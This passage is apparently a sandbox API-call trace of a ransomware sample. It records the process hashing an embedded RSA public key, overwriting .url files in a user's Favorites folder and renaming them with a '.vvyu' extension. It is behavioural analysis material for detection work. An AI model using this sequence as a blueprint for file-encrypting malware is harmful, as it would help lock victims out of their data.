| out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ac0 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d393c0 | out: hHeap=0x6a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.754] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.755] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.755] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.756] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.756] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.756] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.757] CloseHandle (hObject=0x584) returned 1 [0189.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.758] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url.vvyu")) returned 1 [0189.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.760] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.767] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0189.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.768] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url") returned=".url" [0189.768] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.773] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.773] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.776] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.776] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.778] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.778] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.778] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.778] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.779] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.779] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.779] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.779] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.779] GetLastError () returned 0x0 [0189.780] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.780] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.780] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.780] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.780] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.780] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d393c0 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39408 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.781] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a48 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39aa8 | out: hHeap=0x6a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.784] GetCurrentThreadId () returned 0x264 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44000 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.785] GetCurrentThreadId () returned 0x264 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39aa8 [0189.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.788] RtlAllocateHeap 